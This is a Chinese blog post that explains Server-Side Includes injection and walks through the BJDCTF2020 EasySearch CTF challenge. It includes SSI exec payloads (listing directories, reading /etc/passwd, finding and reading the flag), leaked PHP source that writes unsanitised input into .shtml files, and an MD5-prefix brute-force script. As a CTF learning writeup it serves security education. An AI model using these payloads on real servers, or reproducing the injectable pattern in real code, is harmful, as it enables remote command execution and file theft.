SSI注入 + [BJDCTF2020]EasySearch writeup

最新推荐文章于 2022-04-12 11:30:23 发布
最新推荐文章于 2022-04-12 11:30:23 发布
阅读量268 收藏 1
点赞数
分类专栏: ctf # web 文章标签: php SSI ctf web shtml
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/120183443
版权
ctf 同时被 2 个专栏收录
85 篇文章 9 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

SSI注入

全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码

页面中有一小部分是动态输出的时候使用SSI,比如:

  • 文件相关的属性字段
  • 当前时间
  • 访客IP
  • 调用CGI程序

SSI语法

SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。

①显示服务器端环境变量<#echo>

<!–#echo var="DOCUMENT_NAME">		//本文档名称
<!–#echo var="DATE_LOCAL">		//现在时间
<! #echo var="REMOTE_ADDR">		//显示IP地址

②将文本内容直接插入到文档中<#include>

<! #include file="文件名称"–>
<!--#include virtual="index.html" -->

<! #include virtual="文件名称"–>
<!--#include virtual="/www/footer.html" -->

注:file包含文件可以在同一级目录或其子目录中,但不能在上一级目录中,virtual包含文件可以是Web站点上的虚拟目录的完整路径

③显示WEB文档相关信息<#flastmod><#fsize>(如文件制作日期/大小等)

<! #flastmod file="文件名称"–>		//文件最近更新日期
<!–#fsize file="文件名称"–>		//文件的长度

④直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)

<!–#exec cmd="文件名称"–>
<!--#exec cmd="cat /etc/passwd"-->

<!–#exec cgi="文件名称"–>
<!--#exec cgi="/cgi-bin/access_log.cgi"–>

将某一外部程序的输出插入到页面中。可插入CGI程序或者是常规应用程序的输入,这取决于使用的参数是cmd还是cgi。

⑤设置SSI信息显示格式<#config>(如文件制作日期/大小显示方式)

⑥高级SSI可设置变量使用if条件语句。

注入命令

Server-Side Includes (SSI) Injection Software Attack | OWASP Foundation



wp

1.[BJDCTF2020]EasySearch

首先是一个登录界面,扫描得到index.php.swp有源码

<?php
	ob_start();
	function get_hash(){		//生成随机数,用来当文件名
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content);
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {		//登录校验密码,可以爆破MD5       
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>		//username是注入点,这里是回显的地方
            ***
			***';
            fwrite($shtml,$text);		//写一个shtml文件进去,可以进行SSI注入
            fclose($shtml);
            ***
			echo "[!] Header  error ...";		//这其实算个提示吧,shtml文件生成的url放在header里面了
        } else {
            echo "<script>alert('[!] Failed')</script>";

    }else
    {
	***
    }
	***
?>

php脚本爆破md5,得到密码2020666

<?php
$i=1;
while(1){
	if (substr(md5($i),0,6) =='6d0bc1'){
		echo $i;
		break;
	}
	$i++;
}
?>
#2020666

抓包构造SSI指令

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

username=<!--#exec cmd="ls ../"-->&password=2020666

回显处可以得到url:Url_is_here: public/b3682f9d931186c263163bfb7bc28ec199dcc51b.shtml

也可以

<!--#exec cmd="find / -name 'flag*'"-->
得到/var/www/html/flag_990c66bf85a09c664f0b6741840499b2

然后

<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->

在这里插入图片描述

参考文章:https://www.secpulse.com/archives/66934.html

shu天
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SSI ++「SSI++」-crx插件
03-15
提高射击得分 通过允许创建竞争者列表来简化总览,从而提高射击得分。 其他一些工具也得到了改进。 竞争对手列表-您现在可以创建自己的彩色列表。 最多有4个列表。 -仅显示标记的竞争对手的选项。...
SSI++-crx插件
04-05
语言:English 改进拍摄'n分数它 通过允许创建竞争列表以便更容易概述进行拍摄。 还有一些其他工具也得到改善。 竞争对手 - 您现在可以创建自己的彩色列表。 最多4个列表可用。 -Option只显示标记的竞争对手。...
SSI注入
Vinson的博客
09-29 194
ssi是为了赋予html静态页面动态的效果,通过ssi执行系统命令,返回对应结果 若在网站目录中发现.stm,.shtm,.shtml,且网站对ssi的输入没有做到严格过滤,很可能收到ssi注入攻击 攻击机192.168.1.108 靶机192.168.1.109 nikto -host ip + Multiple index files found: /index.php, /inde...
bWAPP----Server-Side Includes (SSI) Injection
weixin_30556959的博客
07-20 227
Server-Side Includes (SSI) Injection 什么是SSISSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执...
CTF-SSI注入
su__xiaoyan的博客
12-25 289
SSI注入 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于CGI,用于执行动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码
SSI注入漏洞
Hydra的博客
11-19 9309
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
SSI使用详解
一叶舟轻
10-14 2228
可以看看Apache的rewrite模块和SSI(Server Side Include).====================================================================SSI使用详解你是否曾经或正在为如何能够在最短的时间内完成对一个包含上千个页面的网站的修改而苦恼?那么可以看一下本文的介绍,或许能够对你有所帮助。什么是SSISSI
SSI STRUTS+SPRING+IBATIS框架搭建
03-14
精简了jar包,只导入必要jar包 更改其他数据库需要导入数据库jar包,以及利用ABATOR生成代码 建立一个sqlserver的数据库 为test test表,字段ID,name两个字段
SSI Spring+struts1+ibatis案例
08-24
Spring+struts1+ibatis案例
浅谈一下SSI+Oracle框架的整合搭建
03-02
最近换了一家公司,公司几乎所有的项目都采用的是Struts2+Spring+Ibatis+Oracle的架构,上一个东家一般用的就是JSF+Spring,所做的项目没有一个用过ORM的框架,至于Struts2也只是平时自己做做Demo玩玩,毕竟才出校园...
bWAPP闯关系列(OS Command Injection)~
weixin_55648772的博客
10-03 1432
bWAPP靶场闯关系列(OS Command Injection+PHP Code Injection+Server-Side Includes (SSI) Injection)
浅析Apache中SSI和CGI的设定方法
tandyong的专栏
05-23 586
由于Apache具有相当高的可移植性,它支持超过30种操作系统,包括Unix、Windows 及Darwin等系统,所以目前在网络上已注册的网域里大部份是使用Apache网页服务器。目前ApacheSoftware Foundation 正致力于发展现在已进入alpha测试阶段的Apache2.0。在这里,我和大家探讨如何修改服务器选项让服务器能提供简单的动态网页内容,也就是支持 CGI程序及 S
[BJDCTF2020]EasySearch
Hopeace的博客
10-14 276
题目名:[BJDCTF2020]EasySearch 作者:Hopeace 靶场地址:https://buuoj.cn/challenges#[BJDCTF2020]EasySearch 知识点:目录扫描,md5生成 0x01 浏览题目 进入主页就是一个登录框,甚至没有注册的地方 不是sql注入,就是要扫目录查看源码(试了一下常见的源码文件缺没有发现) python2 GitHack.py http://4296367a-aa3a-4d92-90a4-1dbefe590195.node4.buuoj.cn:
web buuctf [BJDCTF2020]EasySearch
weixin_44214568的博客
04-12 530
知识点:Apache SSI漏洞 Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞 Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞 Apache SSI 远程命令执行漏洞 - MCY5 - 博客园 1.开题: 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的, 2.贴源码 <?php ob_start(); functio.
BJDCTF 2nd writeup
abtgu的博客
03-23 1342
[BJDCTF 2nd]签到-y1ng 题目: QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== 解题思路: 直接base64解码即可。BJD{W3lc0me_T0_BJDCTF} [BJDCTF 2nd]灵能精通-y1ng 题目: 身经百战的Y1ng已经达到崇高的武术境界,以自律克己来取代狂热者的战斗狂怒与传统的战斗形式。Y1ng所受的训练也进一步将他们的灵能强化到足以瓦解周遭...
一道CTF题引发的思考——SSI注入
11-22 141
题目地址:http://210.32.4.22/index.php 一开始我一直考虑的用<!--#include file="文件"-->的格式进行读取文件,但是一直不成功,后来赛后看了各位师傅的writeup,有师傅跟我说了这两个命令的区别,一个是虚拟目录,一个是相对目录,下面是我后来百度上提问,有师傅告诉我的,权当走过的坑吧。 1.#include file 包含...
SSI使用
Superpig的博客
11-23 671
综述 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执行shell和CGI脚本程序等复杂的功能。SSI 可以称得上是那些资金短缺、时间紧张、工作量大的网站开发人员的最佳...
SSI指令(一)
sophia1010的专栏
10-21 1435
一、什么是 SSISSI(Server Side Include)通常称为“服务端嵌入”或“服务端包含”,即在服务端加载的指令。在页面内容发送到浏览器前,可使用SSI指令将文本图片或应用程序动态包含到网页中。 二、常用场景 1.Hml页面引入css页面片,重构和前端更新互不影响 <!--#include virtual="/sinclude/cssi/h5/1111/wx_mall/popup
CTF夺旗训练课程
热门推荐
taozijun的博客
09-04 1万+
第一章 课程介绍与环境搭建 1-2 环境搭建 攻击机统一为kali,直接用ova文件创建靶场机器后,靶场机器要求进行登陆。 可我们并没有用户名和密码。问题是:如果我们不进行登陆,如何获得靶场机器的ip地址?从而达到联通靶场机器的目的. 这里我们使用netdiscover命令 netdiscover -r ip/子网掩码    24为24位二进制数1,就是255.255.255.0。...
ssi matlab
最新发布
12-18
SSI Matlab是一种用于系统辨识和模型建立的工具。它是基于Matlab平台开发的,结合了Matlab强大的数学计算和数据处理能力,能够帮助工程师和科研人员快速准确地建立和验证模型。 SSI是指系统辨识(System ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值